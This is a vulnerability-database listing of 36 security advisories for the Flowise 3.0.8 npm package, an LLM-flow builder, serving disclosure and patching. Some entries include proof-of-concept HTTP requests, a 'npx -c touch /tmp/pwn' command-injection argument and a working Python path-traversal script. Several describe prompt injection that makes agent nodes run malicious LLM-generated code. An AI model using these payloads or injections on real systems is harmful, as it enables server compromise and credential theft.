Staging Environment: Content and features may be unstable or change without notice.
Search for packages
Package details: pkg:npm/flowise@3.0.8
purl pkg:npm/flowise@3.0.8
Next non-vulnerable version 3.1.0
Latest non-vulnerable version 3.1.2
Risk
Vulnerabilities affecting this package (36)
Vulnerability Summary Fixed by
VCID-14af-nhf3-aqba
Aliases:
CVE-2026-41277
GHSA-3prp-9gf7-4rxx
Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, a Mass Assignment vulnerability in the DocumentStore creation endpoint allows authenticated users to control the primary key (id) and internal state fields of DocumentStore entities. Because the service uses repository.save() with a client-supplied primary key, the POST create endpoint behaves as an implicit UPSERT operation. This enables overwriting existing DocumentStore objects. In multi-workspace or multi-tenant deployments, this can lead to cross-workspace object takeover and broken object-level authorization (IDOR), allowing an attacker to reassign or modify DocumentStore objects belonging to other workspaces. This vulnerability is fixed in 3.1.0.
3.1.0
Affected by 0 other vulnerabilities.
VCID-17k4-psgt-sydg
Aliases:
GHSA-m7mq-85xj-9x33
Flowise: Weak Default Token Hash Secret **Detection Method:** Kolega.dev Deep Code Scan | Attribute | Value | |---|---| | Location | packages/server/src/enterprise/utils/tempTokenUtils.ts:31-34 | | Practical Exploitability | Medium | | Developer Approver | faizan@kolega.ai | ### Description The encryption key for token encryption has a weak default value 'Secre$t' when TOKEN_HASH_SECRET environment variable is not set. ### Affected Code ``` const key = crypto .createHash('sha256') .update(process.env.TOKEN_HASH_SECRET || 'Secre$t') .digest() ``` ### Evidence The default value 'Secre$t' is hardcoded in the source code and is cryptographically weak. This key is used to encrypt user IDs and workspace IDs in JWT tokens. ### Impact Token forgery - attackers can decrypt and manipulate encrypted token metadata, potentially changing user IDs or workspace IDs to escalate privileges or access unauthorized data. ### Recommendation Require TOKEN_HASH_SECRET to be set as a strong random value in environment variables. Throw an error on startup if not configured. Use a minimum of 32 bytes of entropy. ### Notes The TOKEN_HASH_SECRET has a weak hardcoded default 'Secre$t' (lines 31-34 and 50-53). This secret is used to derive an AES-256-CBC encryption key for encrypting sensitive metadata (user ID and workspace ID) embedded in JWT tokens via encryptToken() called at line 394 of passport/index.ts. If TOKEN_HASH_SECRET is not configured, an attacker knowing the default can decrypt the 'meta' field in JWTs to extract user IDs and workspace IDs. While this alone doesn't grant access (the JWT signature is separate), it leaks internal identifiers that could aid other attacks. The .env.example shows '# TOKEN_HASH_SECRET='popcorn'' - another weak value, and it's commented out suggesting it's optional. The application should require this secret to be explicitly set with a strong random value.
3.1.0
Affected by 0 other vulnerabilities.
VCID-19jc-umg6-v7ce
Aliases:
CVE-2026-43995
GHSA-qqvm-66q4-vf5c
Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, multiple tool implementations directly import and invoke raw HTTP clients (node-fetch, axios) instead of using the secured wrapper. These tools include (1) OpenAPIToolkit/OpenAPIToolkit.ts, (2) WebScraperTool/WebScraperTool.ts, (3) MCP/core.ts, and (4) Arxiv/core.ts. This vulnerability is fixed in 3.1.0.
3.1.0
Affected by 0 other vulnerabilities.
VCID-1xfp-4rtg-4bcu
Aliases:
CVE-2026-41138
GHSA-f228-chmx-v6j6
Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, there is a remote code execution vulnerability in AirtableAgent.ts caused by lack of input verification when using Pandas. The user’s input is directly applied to the question parameter within the prompt template and it is reflected to the Python code without any sanitization. This vulnerability is fixed in 3.1.0.
3.1.0
Affected by 0 other vulnerabilities.
VCID-3gp6-wwtd-kkf1
Aliases:
CVE-2026-41279
GHSA-5fw2-mwhh-9947
Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, the text-to-speech generation endpoint (POST /api/v1/text-to-speech/generate) is whitelisted (no auth) and accepts a credentialId directly in the request body. When called without a chatflowId, the endpoint uses the provided credentialId to decrypt the stored credential (e.g., OpenAI or ElevenLabs API key) and generate speech. This vulnerability is fixed in 3.1.0.
3.1.0
Affected by 0 other vulnerabilities.
VCID-488c-vrqu-f7hf
Aliases:
CVE-2026-30820
GHSA-wvhq-wp8g-c7vq
Flowise is a drag & drop user interface to build a customized large language model flow. Prior to version 3.0.13, Flowise trusts any HTTP client that sets the header x-request-from: internal, allowing an authenticated tenant session to bypass all /api/v1/** authorization checks. With only a browser cookie, a low-privilege tenant can invoke internal administration endpoints (API key management, credential stores, custom function execution, etc.), effectively escalating privilege. This issue has been patched in version 3.0.13.
3.0.13
Affected by 26 other vulnerabilities.
VCID-5pup-kgaf-3ubw
Aliases:
CVE-2026-41264
GHSA-3hjv-c53m-58jj
Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, the specific flaw exists within the run method of the CSV_Agents class. The issue results from the lack of proper sandboxing when evaluating an LLM generated python script. An attacker can leverage this vulnerability to execute code in the context of the user running the server. Using prompt injection techniques, an unauthenticated attacker with the ability to send prompts to a chatflow using the CSV Agent node may convince an LLM to respond with a malicious python script that executes attacker controlled commands on the Flowise server. This vulnerability is fixed in 3.1.0.
3.1.0
Affected by 0 other vulnerabilities.
VCID-6ufs-d346-d7ev
Aliases:
CVE-2026-8026
GHSA-8f47-4rh3-x44m
A security flaw has been discovered in FlowiseAI Flowise up to 3.0.12. Affected is the function Login of the file packages/server/src/enterprise/services/account.service.ts of the component API Response Handler. The manipulation results in information disclosure. The attack can be launched remotely. A high complexity level is associated with this attack. The exploitability is told to be difficult. You should upgrade the affected component.
3.0.13
Affected by 26 other vulnerabilities.
VCID-71uq-yx2j-cqak
Aliases:
CVE-2026-41275
GHSA-x5w6-38gp-mrqh
Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, the password reset functionality on cloud.flowiseai.com sends a reset password link over the unsecured HTTP protocol instead of HTTPS. This behavior introduces the risk of a man-in-the-middle (MITM) attack, where an attacker on the same network as the user (e.g., public Wi-Fi) can intercept the reset link and gain unauthorized access to the victim’s account. This vulnerability is fixed in 3.1.0.
3.1.0
Affected by 0 other vulnerabilities.
VCID-9bht-svq8-87b4
Aliases:
GHSA-x2g5-fvc2-gqvp
Flowise has Insufficient Password Salt Rounds
3.0.13
Affected by 26 other vulnerabilities.
VCID-a1e4-f5dh-w3a5
Aliases:
GHSA-6pcv-j4jx-m4vx
Flowise: Unauthenticated Information Disclosure of OAuth Secrets (Cleartext) via GET Request ### Summary I have discovered a critical Missing Authentication vulnerability on the /api/v1/loginmethod endpoint. The API allows unauthenticated users (guests) to retrieve the full SSO configuration of any organization by simply providing an organizationId. The response includes sensitive OAuth credentials (Client Secrets) in cleartext. ### PoC The following request can be sent by anyone on the internet without any cookies or authorization headers. Request ```http GET /api/v1/loginmethod?organizationId=<any_organization_id> HTTP/2 Host: cloud.flowiseai.com Accept: application/json Content-Type: application/json ``` Response: The server returns 200 OK with sensitive credentials: ```json { "providers": [ { "id": "a04ba769-b810-481d-8d6b-84f8c377dea5", "organizationId": "bd2b74e0-e0cd-4bb5-ba98-3cc2ae683d5d", "name": "azure", "config": { "tenantID": "", "clientID": "", "clientSecret": "" }, "status": "disable", "createdDate": "2025-12-26T18:52:33.453Z", "updatedDate": "2025-12-26T19:31:56.087Z", "createdBy": "6ab311fa-0d0a-4bd6-996e-4ae721377fb2", "updatedBy": "6ab311fa-0d0a-4bd6-996e-4ae721377fb2" }, { "id": "eda8bd90-1c45-4aca-933f-3a53d9be4161", "organizationId": "bd2b74e0-e0cd-4bb5-ba98-3cc2ae683d5d", "name": "google", "config": { "clientID": "123455", "clientSecret": "123455" }, "status": "enable", "createdDate": "2025-12-26T18:52:33.453Z", "updatedDate": "2025-12-26T19:31:56.087Z", "createdBy": "6ab311fa-0d0a-4bd6-996e-4ae721377fb2", "updatedBy": "6ab311fa-0d0a-4bd6-996e-4ae721377fb2" }, { "id": "0d238df0-c89c-4733-bf57-6ec06f58c7e7", "organizationId": "bd2b74e0-e0cd-4bb5-ba98-3cc2ae683d5d", "name": "auth0", "config": { "domain": "", "clientID": "", "clientSecret": "" }, "status": "disable", "createdDate": "2025-12-26T18:52:33.453Z", "updatedDate": "2025-12-26T19:31:56.087Z", "createdBy": "6ab311fa-0d0a-4bd6-996e-4ae721377fb2", "updatedBy": "6ab311fa-0d0a-4bd6-996e-4ae721377fb2" }, { "id": "e060ae88-c7f4-4b7c-9bdc-5321963a1648", "organizationId": "bd2b74e0-e0cd-4bb5-ba98-3cc2ae683d5d", "name": "github", "config": { "clientID": "", "clientSecret": "" }, "status": "disable", "createdDate": "2025-12-26T18:52:33.453Z", "updatedDate": "2025-12-26T19:31:56.087Z", "createdBy": "6ab311fa-0d0a-4bd6-996e-4ae721377fb2", "updatedBy": "6ab311fa-0d0a-4bd6-996e-4ae721377fb2" } ], "callbacks": [ { "providerName": "azure", "callbackURL": "https://cloud.flowiseai.com/api/v1/azure/callback" }, { "providerName": "google", "callbackURL": "https://cloud.flowiseai.com/api/v1/google/callback" }, { "providerName": "auth0", "callbackURL": "https://cloud.flowiseai.com/api/v1/auth0/callback" }, { "providerName": "github", "callbackURL": "https://cloud.flowiseai.com/api/v1/github/callback" } ] } ``` ### Affected Deployments - FlowiseAI Cloud (cloud.flowiseai.com) - Self-hosted FlowiseAI instances where the /api/v1/loginmethod endpoint is exposed ### Impact An unauthenticated attacker can harvest sensitive API secrets (Google, Microsoft, GitHub Client Secrets) from any organization on the cloud platform. This leads to complete compromise of the organization's third-party integrations and potential data breaches.
3.1.0
Affected by 0 other vulnerabilities.
VCID-affy-v76q-fub6
Aliases:
CVE-2026-30822
GHSA-mq4r-h2gh-qv7x
Flowise is a drag & drop user interface to build a customized large language model flow. Prior to version 3.0.13, unauthenticated users can inject arbitrary values into internal database fields when creating leads. This issue has been patched in version 3.0.13.
3.0.13
Affected by 26 other vulnerabilities.
VCID-aqg8-6us7-uqef
Aliases:
CVE-2026-41266
GHSA-4jpm-cgx2-8h37
Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, /api/v1/public-chatbotConfig/:id ep exposes sensitive data including API keys, HTTP authorization headers and internal configuration without any authentication. An attacker with knowledge just of a chatflow UUID can retrieve credentials stored in password type fields and HTTP headers, leading to credential theft and more. This vulnerability is fixed in 3.1.0.
3.1.0
Affected by 0 other vulnerabilities.
VCID-b97u-efzx-dffn
Aliases:
CVE-2026-41274
GHSA-28g4-38q8-3cwc
Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, the GraphCypherQAChain node forwards user-provided input directly into the Cypher query execution pipeline without proper sanitization. An attacker can inject arbitrary Cypher commands that are executed on the underlying Neo4j database, enabling data exfiltration, modification, or deletion. This vulnerability is fixed in 3.1.0.
3.1.0
Affected by 0 other vulnerabilities.
VCID-bkmk-k9mn-ekhx
Aliases:
GHSA-2qqc-p94c-hxwh
Flowise: Weak Default Express Session Secret **Detection Method:** Kolega.dev Deep Code Scan | Attribute | Value | |---|---| | Location | packages/server/src/enterprise/middleware/passport/index.ts:55 | | Practical Exploitability | High | | Developer Approver | faizan@kolega.ai | ### Description Express session secret has a weak default value 'flowise' when EXPRESS_SESSION_SECRET is not set. ### Affected Code ``` secret: process.env.EXPRESS_SESSION_SECRET || 'flowise' ``` ### Evidence The default session secret 'flowise' is publicly visible and weak. Session cookies signed with this secret can be forged by attackers. ### Impact Session hijacking and forgery - attackers can create arbitrary session cookies to impersonate any user, bypassing all authentication mechanisms. ### Recommendation Require EXPRESS_SESSION_SECRET to be set with a strong random value. Throw an error on startup if not configured. Use cryptographically strong random strings (minimum 256 bits). ### Notes The Express session secret defaults to the string 'flowise' when EXPRESS_SESSION_SECRET is not set (line 55). This secret is used to sign session cookies via express-session middleware. Since 'flowise' is publicly visible in the source code, an attacker can forge valid session cookies to impersonate any user without authentication. The .env.example file has this commented out (# EXPRESS_SESSION_SECRET=flowise), implying it's optional, which compounds the risk. Unlike development-only defaults, this code path is active in production if the environment variable is not set. The application should require EXPRESS_SESSION_SECRET to be explicitly configured with a cryptographically strong random value and fail to start otherwise.
3.1.0
Affected by 0 other vulnerabilities.
VCID-d4wa-szeh-43ab
Aliases:
CVE-2026-41267
GHSA-48m6-ch88-55mj
3.1.0
Affected by 0 other vulnerabilities.
VCID-dtss-epth-z7fh
Aliases:
CVE-2026-31829
GHSA-fvcw-9w9r-pxc7
Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.0.13, Flowise exposes an HTTP Node in AgentFlow and Chatflow that performs server-side HTTP requests using user-controlled URLs. By default, there are no restrictions on target hosts, including private/internal IP ranges (RFC 1918), localhost, or cloud metadata endpoints. This enables Server-Side Request Forgery (SSRF), allowing any user interacting with a publicly exposed chatflow to force the Flowise server to make requests to internal network resources that are inaccessible from the public internet. This vulnerability is fixed in 3.0.13.
3.0.13
Affected by 26 other vulnerabilities.
VCID-dzed-27rk-3qav
Aliases:
CVE-2026-41273
GHSA-6f7g-v4pp-r667
Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, Flowise contains an authentication bypass vulnerability that allows an unauthenticated attacker to obtain OAuth 2.0 access tokens associated with a public chatflow. By accessing a public chatflow configuration endpoint, an attacker can retrieve internal workflow data, including OAuth credential identifiers, which can then be used to refresh and obtain valid OAuth 2.0 access tokens without authentication. This vulnerability is fixed in 3.1.0.
3.1.0
Affected by 0 other vulnerabilities.
VCID-e65e-s5sd-kuhp
Aliases:
CVE-2026-41272
GHSA-2x8m-83vc-6wv4
Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, the core security wrappers (secureAxiosRequest and secureFetch) intended to prevent Server-Side Request Forgery (SSRF) contain multiple logic flaws. These flaws allow attackers to bypass the allow/deny lists via DNS Rebinding (Time-of-Check Time-of-Use) or by exploiting the default configuration which fails to enforce any deny list. This vulnerability is fixed in 3.1.0.
3.1.0
Affected by 0 other vulnerabilities.
VCID-ejdc-j73x-jydk
Aliases:
CVE-2026-41269
GHSA-rh7v-6w34-w2rr
Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, the Chatflow configuration file upload settings can be modified to allow the application/javascript MIME type. This lets an attacker upload .js files even though the frontend doesn’t normally allow JavaScript uploads. This enables attackers to persistently store malicious Node.js web shells on the server, potentially leading to Remote Code Execution (RCE). This vulnerability is fixed in 3.1.0.
3.1.0
Affected by 0 other vulnerabilities.
VCID-fu6t-9dk4-jbh9
Aliases:
CVE-2026-40933
GHSA-c9gw-hvqq-f33r
Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, due to unsafe serialization of stdio commands in the MCP adapter, an authenticated attacker can add an MCP stdio server with an arbitrary command, achieving command execution. The vulnerability lies in a bug in the input sanitization from the “Custom MCP” configuration in http://localhost:3000/canvas - where any user can add a new MCP, when doing so - adding a new MCP using stdio, the user can add any command, even though your code have input sanitization checks such as validateCommandInjection and validateArgsForLocalFileAccess, and a list of predefined specific safe commands - these commands, for example "npx" can be combined with code execution arguments ("-c touch /tmp/pwn") that enable direct code execution on the underlying OS. This vulnerability is fixed in 3.1.0.
3.1.0
Affected by 0 other vulnerabilities.
VCID-gvpx-4wkw-43cz
Aliases:
GHSA-9hrv-gvrv-6gf2
Flowise Execute Flow function has an SSRF vulnerability ### Summary The attacker provides an intranet address through the base url field configured in the Execute Flow node → Bypass checkDenyList / resolveAndValidate in httpSecurity.ts (not called) → Causes the server to initiate an HTTP request to any internal network address, read cloud metadata, or detect internal network services ### Details <img width="1280" height="860" alt="9a52a74e6fe2fd78e4962d1d68057fc2" src="https://github.com/user-attachments/assets/20df0006-9129-4886-8928-16d19a617c23" /> Then initiate the call: ``` POST /api/v1/prediction/d6739838-d3b3-43d9-86ff-911a3d757a7e HTTP/1.1 Host: 127.0.0.1:3000 Content-Type: application/json Authorization: Bearer apikey Content-Length: 17 {"question": "1"} ``` Server received a request: <img width="1432" height="172" alt="f45c757fec408e13739db068252ff21b" src="https://github.com/user-attachments/assets/d3dfe0f5-83ec-4c79-ab32-754382a68d5f" /> And there is an echo: <img width="1280" height="666" alt="fa0caf0deb306cfeeea8fdf8941a287e" src="https://github.com/user-attachments/assets/55a94d25-120b-4e9c-9517-46c2fc2b667f" /> Fix: Call secureFetch for verification ### Impact This is a Server-Side Request Forgery (SSRF) vulnerability that may lead to the following risks: - Explore Internal Web Applications - Access sensitive management interfaces - Leak internal configuration, credentials, or confidential information This vulnerability significantly increases the risk of internal service enumeration and potential lateral movement in enterprise environments.
3.1.0
Affected by 0 other vulnerabilities.
VCID-hkfs-v3bp-kbh5
Aliases:
CVE-2026-41265
GHSA-v38x-c887-992f
Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, the specific flaw exists within the run method of the Airtable_Agents class. The issue results from the lack of proper sandboxing when evaluating an LLM generated python script. Using prompt injection techniques, an unauthenticated attacker with the ability to send prompts to a chatflow using the Airtable Agent node may convince an LLM to respond with a malicious python script that executes attacker controlled commands on the flowise server. This vulnerability is fixed in 3.1.0.
3.1.0
Affected by 0 other vulnerabilities.
VCID-j5hh-haj2-qydg
Aliases:
CVE-2026-41137
GHSA-9wc7-mj3f-74xv
Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, The CSVAgent allows providing a custom Pandas CSV read code. Due to lack of sanitization, an attacker can provide a command injection payload that will get interpolated and executed by the server. This vulnerability is fixed in 3.1.0.
3.1.0
Affected by 0 other vulnerabilities.
VCID-jcze-eg2c-mkcf
Aliases:
CVE-2026-30824
GHSA-5f53-522j-j454
Flowise is a drag & drop user interface to build a customized large language model flow. Prior to version 3.0.13, the NVIDIA NIM router (/api/v1/nvidia-nim/*) is whitelisted in the global authentication middleware, allowing unauthenticated access to privileged container management and token generation endpoints. This issue has been patched in version 3.0.13.
3.0.13
Affected by 26 other vulnerabilities.
VCID-k579-xd81-hqdu
Aliases:
CVE-2026-30821
GHSA-j8g8-j7fc-43v6
Flowise is a drag & drop user interface to build a customized large language model flow. Prior to version 3.0.13, the /api/v1/attachments/:chatflowId/:chatId endpoint is listed in WHITELIST_URLS, allowing unauthenticated access to the file upload API. While the server validates uploads based on the MIME types defined in chatbotConfig.fullFileUpload.allowedUploadFileTypes, it implicitly trusts the client-provided Content-Type header (file.mimetype) without verifying the file's actual content (magic bytes) or extension (file.originalname). Consequently, an attacker can bypass this restriction by spoofing the Content-Type as a permitted type (e.g., application/pdf) while uploading malicious scripts or arbitrary files. Once uploaded via addArrayFilesToStorage, these files persist in backend storage (S3, GCS, or local disk). This vulnerability serves as a critical entry point that, when chained with other features like static hosting or file retrieval, can lead to Stored XSS, malicious file hosting, or Remote Code Execution (RCE). This issue has been patched in version 3.0.13.
3.0.13
Affected by 26 other vulnerabilities.
VCID-ksmv-s6c9-t7ap
Aliases:
GHSA-jc5m-wrp2-qq38
Flowise Vulnerable to PII Disclosure on Unauthenticated Forgot Password Endpoint
3.0.13
Affected by 26 other vulnerabilities.
VCID-m3j3-4u39-euht
Aliases:
CVE-2026-30823
GHSA-cwc3-p92j-g7qm
Flowise is a drag & drop user interface to build a customized large language model flow. Prior to version 3.0.13, there is an IDOR vulnerability, leading to account takeover and enterprise feature bypass via SSO configuration. This issue has been patched in version 3.0.13.
3.0.13
Affected by 26 other vulnerabilities.
VCID-pzza-9xq9-a7de
Aliases:
CVE-2026-41268
GHSA-cvrr-qhgw-2mm6
Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, Flowise is vulnerable to a critical unauthenticated remote command execution (RCE) vulnerability. It can be exploited via a parameter override bypass using the FILE-STORAGE:: keyword combined with a NODE_OPTIONS environment variable injection. This allows for the execution of arbitrary system commands with root privileges within the containerized Flowise instance, requiring only a single HTTP request and no authentication or knowledge of the instance. This vulnerability is fixed in 3.1.0.
3.1.0
Affected by 0 other vulnerabilities.
VCID-rgmv-6bqh-eqf2
Aliases:
CVE-2026-41271
GHSA-6r77-hqx7-7vw8
Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, a Server-Side Request Forgery (SSRF) vulnerability exists in FlowiseAI's POST/GET API Chain components that allows unauthenticated attackers to force the server to make arbitrary HTTP requests to internal and external systems. By injecting malicious prompt templates, attackers can bypass the intended API documentation constraints and redirect requests to sensitive internal services, potentially leading to internal network reconnaissance and data exfiltration. This vulnerability is fixed in 3.1.0.
3.1.0
Affected by 0 other vulnerabilities.
VCID-tdm1-91mc-8kgr
Aliases:
GHSA-cc4f-hjpj-g9p8
Flowise: Weak Default JWT Secrets **Detection Method:** Kolega.dev Deep Code Scan | Attribute | Value | |---|---| | Severity | Critical | | Location | packages/server/src/enterprise/middleware/passport/index.ts:29-34 | | Practical Exploitability | High | | Developer Approver | faizan@kolega.ai | ### Description JWT secrets have weak hardcoded defaults ('auth_token', 'refresh_token', 'AUDIENCE', 'ISSUER'). Attackers can forge valid JWTs and impersonate any user. ### Affected Code ``` const jwtAudience = process.env.JWT_AUDIENCE || 'AUDIENCE' const jwtIssuer = process.env.JWT_ISSUER || 'ISSUER' const jwtAuthTokenSecret = process.env.JWT_AUTH_TOKEN_SECRET || 'auth_token' const jwtRefreshSecret = process.env.JWT_REFRESH_TOKEN_SECRET || process.env.JWT_AUTH_TOKEN_SECRET || 'refresh_token' ``` ### Evidence All JWT defaults are weak strings. Refresh token falls back to auth token which is a design flaw. If any environment variable is unset, weak default is used. ### Impact Complete authentication bypass. Attackers can forge valid JWTs for any user account. No authentication required to access protected endpoints. Can escalate to admin access. ### Recommendation Remove all default secrets - require all JWT environment variables to be explicitly set. Add startup validation throwing error if any JWT secret is missing. Use cryptographically random secrets (256+ bits) for each secret independently. Implement JWT secret rotation mechanism. ### Notes The JWT secrets have genuinely weak hardcoded defaults ('auth_token', 'refresh_token', 'AUDIENCE', 'ISSUER') at lines 29-34. If an administrator deploys without setting the environment variables JWT_AUTH_TOKEN_SECRET, JWT_REFRESH_TOKEN_SECRET, JWT_AUDIENCE, and JWT_ISSUER, the application will use these trivially guessable values. An attacker knowing these defaults (which are publicly visible in the source code) can forge valid JWTs to impersonate any user, including administrators. The fallback chain at line 34 where jwtRefreshSecret falls back to jwtAuthTokenSecret is an additional design weakness - if only JWT_AUTH_TOKEN_SECRET is set, both tokens share the same secret. While .env.example files provide placeholder values, these are also weak and publicly visible. The application should fail to start if these secrets are not explicitly configured with strong values, rather than silently falling back to insecure defaults.
3.1.0
Affected by 0 other vulnerabilities.
VCID-v1nz-wwsu-qycg
Aliases:
CVE-2026-41270
GHSA-xhmj-rg95-44hv
Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, a Server-Side Request Forgery (SSRF) protection bypass vulnerability exists in the Custom Function feature. While the application implements SSRF protection via HTTP_DENY_LIST for axios and node-fetch libraries, the built-in Node.js http, https, and net modules are allowed in the NodeVM sandbox without equivalent protection. This allows authenticated users to bypass SSRF controls and access internal network resources (e.g., cloud provider metadata services) This vulnerability is fixed in 3.1.0.
3.1.0
Affected by 0 other vulnerabilities.
VCID-v9hg-7pex-g3dp
Aliases:
GHSA-w6v6-49gh-mc9w
Flowise: Path Traversal in Vector Store basePath ## Summary The Faiss and SimpleStore (LlamaIndex) vector store implementations accept a `basePath` parameter from user-controlled input and pass it directly to filesystem write operations without any sanitization. An authenticated attacker can exploit this to write vector store data to arbitrary locations on the server filesystem. ## Vulnerability Details | Field | Value | |-------|-------| | Affected File | `packages/components/nodes/vectorstores/Faiss/Faiss.ts` (lines 79, 91) | | Affected File | `packages/components/nodes/vectorstores/SimpleStore/SimpleStore.ts` (lines 83-104) | ## Prerequisites 1. **Authentication**: Valid API token with `documentStores:upsert-config` permission 2. **Document Store**: An existing Document Store with at least one processed chunk 3. **Embedding Credentials**: Valid embedding provider credentials (e.g., OpenAI API key) ## Root Cause ### Faiss (`Faiss.ts`) ```typescript async upsert(nodeData: INodeData): Promise<Partial<IndexingResult>> { const basePath = nodeData.inputs?.basePath as string // User-controlled // ... const vectorStore = await FaissStore.fromDocuments(finalDocs, embeddings) await vectorStore.save(basePath) // Direct filesystem write, no validation } ``` ### SimpleStore (`SimpleStore.ts`) ```typescript async upsert(nodeData: INodeData): Promise<Partial<IndexingResult>> { const basePath = nodeData.inputs?.basePath as string // User-controlled let filePath = '' if (!basePath) filePath = path.join(getUserHome(), '.flowise', 'llamaindex') else filePath = basePath // Used directly without sanitization const storageContext = await storageContextFromDefaults({ persistDir: filePath }) // Writes to arbitrary path } ``` ## Impact An authenticated attacker can: 1. **Write files to arbitrary locations** on the server filesystem 2. **Overwrite existing files** if the process has write permissions 3. **Potential for code execution** by writing to web-accessible directories or startup scripts 4. **Data exfiltration** by writing to network-mounted filesystems ## Proof of Concept ### poc.py ```python #!/usr/bin/env python3 """ POC: Path Traversal in Vector Store basePath (CWE-22) Usage: python poc.py --target http://localhost:3000 --token <API_KEY> --store-id <STORE_ID> --credential <EMBEDDING_CREDENTIAL_ID> """ import argparse import json import urllib.request import urllib.error def post_json(url, data, headers): req = urllib.request.Request( url, data=json.dumps(data).encode("utf-8"), headers={**headers, "Content-Type": "application/json"}, method="POST", ) with urllib.request.urlopen(req, timeout=120) as resp: return resp.status, resp.read().decode("utf-8", errors="replace") def main(): ap = argparse.ArgumentParser() ap.add_argument("--target", required=True) ap.add_argument("--token", required=True) ap.add_argument("--store-id", required=True) ap.add_argument("--credential", required=True) ap.add_argument("--base-path", default="/tmp/flowise-path-traversal-poc") args = ap.parse_args() payload = { "storeId": args.store_id, "vectorStoreName": "faiss", "vectorStoreConfig": {"basePath": args.base_path}, "embeddingName": "openAIEmbeddings", "embeddingConfig": {"credential": args.credential}, } url = args.target.rstrip("/") + "/api/v1/document-store/vectorstore/insert" headers = {"Authorization": f"Bearer {args.token}"} try: status, body = post_json(url, payload, headers) print(body) except urllib.error.HTTPError as e: print(e.read().decode()) if __name__ == "__main__": main() ``` ### Setup 1. Create a Document Store in Flowise UI 2. Add a Document Loader (e.g., Plain Text) with any content 3. Click "Process" to create chunks 4. Note the Store ID from the URL 5. Get your embedding credential ID from Settings → Credentials ### Exploitation ```bash # Write to /tmp python poc.py \ --target http://127.0.0.1:3000 \ --token <API_TOKEN> \ --store-id <STORE_ID> \ --credential <OPENAI_CREDENTIAL_ID> \ --base-path /tmp/flowise-pwned # Path traversal variant python poc.py \ --target http://127.0.0.1:3000 \ --token <API_TOKEN> \ --store-id <STORE_ID> \ --credential <OPENAI_CREDENTIAL_ID> \ --base-path "../../../../tmp/traversal-test" ``` ### Evidence ``` $ python poc.py --target http://127.0.0.1:3000/ --token <TOKEN> --store-id 30af9716-ea51-47e6-af67-5a759a835100 --credential bb1baf6e-acb7-4ea0-b167-59a09a28108f --base-path /tmp/flowise-pwned {"numAdded":1,"addedDocs":[{"pageContent":"Lorem Ipsum","metadata":{"docId":"d84d9581-0778-454d-984e-42b372b1b555"}}],"totalChars":0,"totalChunks":0,"whereUsed":[]} $ ls -la /tmp/flowise-pwned/ total 16 drwxr-xr-x 4 user wheel 128 Jan 17 12:00 . drwxrwxrwt 12 root wheel 384 Jan 17 12:00 .. -rw-r--r-- 1 user wheel 1234 Jan 17 12:00 docstore.json -rw-r--r-- 1 user wheel 5678 Jan 17 12:00 faiss.index ```
3.1.0
Affected by 0 other vulnerabilities.
VCID-w9yr-5jbp-q7fm
Aliases:
CVE-2026-41276
GHSA-f6hc-c5jr-878p
Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, this vulnerability allows remote attackers to bypass authentication on affected installations of FlowiseAI Flowise. Authentication is not required to exploit this vulnerability. The specific flaw exists within the resetPassword method of the AccountService class. There is no check performed to ensure that a password reset token has actually been generated for a user account. By default the value of the reset token stored in a users account is null, or an empty string if they've reset their password before. An attacker with knowledge of the user's email address can submit a request to the "/api/v1/account/reset-password" endpoint containing a null or empty string reset token value and reset that user's password to a value of their choosing. This vulnerability is fixed in 3.1.0.
3.1.0
Affected by 0 other vulnerabilities.
VCID-ywgu-76cy-uqe7
Aliases:
GHSA-x7rp-qj2h-ghgw
Flowise Fails to Invalidate Existing Sessions After Password Changes
3.0.10
Affected by 35 other vulnerabilities.
VCID-zwna-stj5-3yhm
Aliases:
CVE-2026-41278
GHSA-w47f-j8rh-wx87
Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, the GET /api/v1/public-chatflows/:id endpoint returns the full chatflow object without sanitization for public chatflows. Docker validation revealed this is worse than initially assessed: the sanitizeFlowDataForPublicEndpoint function does NOT exist in the released v3.0.13 Docker image. Both public-chatflows AND public-chatbotConfig return completely raw flowData including credential IDs, plaintext API keys, and password-type fields. This vulnerability is fixed in 3.1.0.
3.1.0
Affected by 0 other vulnerabilities.
Vulnerabilities fixed by this package (6)
Vulnerability Summary Aliases
VCID-39aw-3gc6-bkgb Flowise before 3.0.5 allows XSS via an IFRAME element when an admin views the chat log. CVE-2025-50538
GHSA-964p-j4gg-mhwc
VCID-abyp-yn76-1yfp Flowise v3.0.1 < 3.0.8 and all versions after with 'ALLOW_BUILTIN_DEP' enabled contain an authenticated remote code execution vulnerability and node VM sandbox escape due to insecure use of integrated modules (Puppeteer and Playwright) within the nodevm execution environment. An authenticated attacker able to create or run a tool that leverages Puppeteer/Playwright can specify attacker-controlled browser binary paths and parameters. When the tool executes, the attacker-controlled executable/parameters are run on the host and circumvent the intended nodevm sandbox restrictions, resulting in execution of arbitrary code in the context of the host. This vulnerability was incorrectly assigned as a duplicate CVE-2025-26319 by the developers and should be considered distinct from that identifier. CVE-2025-34267
GHSA-r4hh-pcgx-j5r2
VCID-jmps-anck-eqdt Flowise is vulnerable to arbitrary file exposure through its ReadFileTool GHSA-j44m-5v8f-gc9c
